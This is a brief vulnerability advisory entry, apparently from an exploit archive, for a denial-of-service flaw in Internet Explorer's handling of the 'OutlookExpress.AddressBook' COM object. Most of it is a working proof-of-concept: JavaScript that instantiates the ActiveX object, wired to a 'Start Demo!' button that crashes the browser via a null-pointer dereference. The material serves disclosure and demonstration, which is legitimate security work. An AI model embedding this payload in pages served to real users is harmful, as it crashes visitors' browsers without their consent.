source: https://www.securityfocus.com/bid/18771/info

Microsoft Internet Explorer is prone to a denial-of-service condition when processing the 'OutlookExpress.AddressBook' COM object. 

A successful attack may cause the browser to fail due to a null-pointer dereference.

// MoBB Demonstration
function Demo() {
	var a = new ActiveXObject("OutlookExpress.AddressBook");
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>